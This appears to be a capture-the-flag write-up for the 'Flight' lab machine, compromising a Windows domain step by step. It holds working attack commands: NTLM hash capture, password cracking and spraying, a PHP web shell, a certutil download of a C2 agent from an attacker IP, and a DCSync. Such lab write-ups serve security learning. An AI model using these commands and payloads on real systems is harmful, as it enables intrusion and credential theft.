Flight

Enumeration

Scan

nmap -sC -sV -oN scans/detailed.nmap 10.10.11.187

Web

Going to flight.htb shows what seems to be a static site with no attack vectors.

Enumerating for subdomains:

ffuf -u http://10.10.11.187 -H "Host: FUZZ.flight.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt --fs 7069

School Subdomain

This time, we notice that the server is using PHP, and the html content is being pulled via the view URL parameter

By changing the view parameter to index.php, we can view the source code. There seems to be some sort of security filter.

Foothold

Responder

The filter for backslashes is there as an attempt to stop the attack we will perform. We will be using an RFI to coerce the server into authenticating to an SMB server that we control to view a fake share, capturing the service account’s NTLMv2 hash in the process. Let’s use Responder to act as the malicious SMB server. We will get around the security filter by using forward slashes rather than backslashes.

Next, let’s crack the hash offline with hashcat

hashcat -m 5600 svc_apache.hash /usr/share/wordlists/rockyou.txt

The hash cracks pretty fast, giving us valid creds: svc_apache:S@Ss!K@*t13

After some poking around in SMB shares, we don’t find anything too interesting with these creds.

Password Spray

One thing we can try is spray this password against all other users, testing for password reuse:

# Get user list
nxc smb flight.htb -u svc_apache -p 'S@Ss!K@*t13' --users
# Spray after grabbing the user list
nxc smb flight.htb -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

More valid creds: s.moon:S@Ss!K@*t13

Lateral Movement

NTLM Theft

With our new creds, let’s check our SMB access:

nxc smb 10.10.11.187 -u s.moon -p 'S@Ss!K@*t13' --shares

Now we have write access to the “Shared” share Let’s try a similar attack as before using Responder, but this time, uploading a file that will cause the authentication attempt.
To generate the payload, let’s use the following tool:
https://github.com/Greenwolf/ntlm_theft

python3 ntlm_theft.py --generate all --server 10.10.14.11 --filename evil

With Responder still running, we will upload the desktop.ini payload to the “Shared” share

Cracking again with hashcat:

hashcat -m 5600 c.bum.hash /usr/share/wordlists/rockyou.txt

Creds: c.bum:Tikkycoll_431012284

Web Shell

With the new creds, we have write perms on the web share:

nxc smb 10.10.11.187 -u s.moon -p 'S@Ss!K@*t13' --shares

Let’s upload a simple PHP shell as cmd.php to get RCE as svc_apache.
PHP code:

<?php system($_REQUEST['cmd']); ?>

Uploading:

Mythic

We will be using Mythic to manage callbacks, using apollo agents with a simple http profile.
After building the apollo agent, let's deliver the payload with a simple python web server.
Commands:

# Download
curl 'http://school.flight.htb/cmd.php?cmd=certutil.exe+-urlcache+-f+-split+http://10.10.14.11:8000/apollo.exe+C:\\Windows\\Tasks\\apollo.exe'
# Execute
curl 'http://school.flight.htb/cmd.php?cmd=C:\\Windows\\Tasks\\apollo.exe'

And we get a callback!

Now, we can move laterally to the “c.bum” user with the creds we got previously.

shell icacls "C:\Windows\Tasks\apollo.exe" /grant Everyone:F
register_assembly # Pick RunasCs.exe
execute_assembly -Assembly "RunasCs.exe -Arguments c.bum Tikkycoll_431012284 C:\Windows\Tasks\apollo.exe"

This gives us a callback as “c.bum”, which gives us user.txt

Privilege Escalation

Enumeration

With some initial enumeration, we can see that there is IIS running on port 8000, and we have write access on C:\inetpub\development

shell netstat -ano | findstr LISTENING
shell icacls development

IIS Abuse

First, let's start a socks proxy to access the internal site more easily.

# In Mythic:
socks5 7000

Adding FoxyProxy config:

Now we can access the internal IIS site from our browser:

A common way to abuse IIS is to upload a .aspx webshell, which we can do since we have write access. After using Mythic to upload the webshell, we navigate to it and get code execution as IIS APPPOOL\DefaultAppPool, which is a virtual account that we can use get system level access. Let's get a new callback then proceed with exploitation.

Let's use Rubeus to get a TGT

This gives us a ticket in kirbi base64 format, so let’s convert it to ccache then use it to perform a DCSync to grab Administrator credentials.

cat ticket.kirbi.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
KRB5CCNAME=ticket.ccache faketime "$(ntpdate -q flight.htb | cut -d ' ' -f 1,2)" impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user Administrator -target-ip 10.10.11.187

Now, we can simple psexec to get a shell as SYSTEM